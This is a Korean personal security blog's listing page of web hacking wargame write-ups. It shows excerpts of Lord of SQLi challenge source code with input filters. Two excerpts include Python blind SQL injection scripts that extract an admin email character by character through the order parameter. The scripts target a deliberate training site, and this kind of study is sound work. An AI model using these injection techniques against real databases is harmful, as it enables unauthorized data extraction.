일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 행정지역 DB
- 인턴 지원
- Django
- Forensic 절차
- DBMS
- restapi
- Layered Architecture
- 네이버 인턴
- mysql
- JSTL
- Database
- 소프트웨어 개발보안 경진대회
- react
- 3단계 지역 DB
- 인턴 후기
- frontend
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- 소개딩
- jsp
- 메모리 포랜식
- webhacking 처음
- spring
- SessionAttribute
- 방명록 만들기
- EER
- reversing.kr
- 정보보호병 후기
- PyAmdecoder
- riceteacatpanda
- 동읍면 DB
- Today
- Total
목록WEB_HACKING (112)
웹찢남
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(|\)|union/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id,pw from prob_frankenstein where id='frankenstein' and pw='{$_GET[pw]}'"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(mysqli_error($db)) exit("error"); $_GET[pw] = addslashes($_GET[pw]); $query = "s..
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\./i', $_GET[id])) exit("No Hack ~_~"); if(preg_match('/prob|_|\./i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_blue_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(preg_match('/\'|\\\/i', $_GET[id]))..
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\./i', $_GET['id'])) exit("No Hack ~_~"); if(strlen($_GET['id']) > 7) exit("too long string"); $no = is_numeric($_GET['no']) ? $_GET['no'] : 1; $query = "select id from prob_red_dragon where id='{$_GET['id']}' and no={$no}"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(..
include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~"); if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; echo "query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']){ ..
저번의 문제와 별 다를 게없다, hell_fire에서 benchmark나 sleep 을 통하여 문제를 푸는거 였나보다,,, import re import requests import time flag = '' length= 0 session =dict(PHPSESSID="자신의 PHPSESSID") for i in range (1,40): for j in range(48,128): r=requests.post("https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=if(id='admin' and ord(substr(email,"+str(i)+",1))="+str(j)+",score,1234)",cookies=s..
전과 달리 위에 표가 있고 삽입한 값에 따라 표 안의 순서가 뒤바뀐다. order by 를 if 문을 통하여 순서를 바꿔보면 되는데 이 문제는 뭔가 이상했던걸로 기억한다... 어쩃든 CLEAR~! import re import requests import time flag = '' length= 0 session =dict(PHPSESSID="자신의 PHPSESSID") for i in range (1,40): for j in range(48,128): r=requests.post("https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=if(id='admin' and ord(substr(email,"+str(i)+..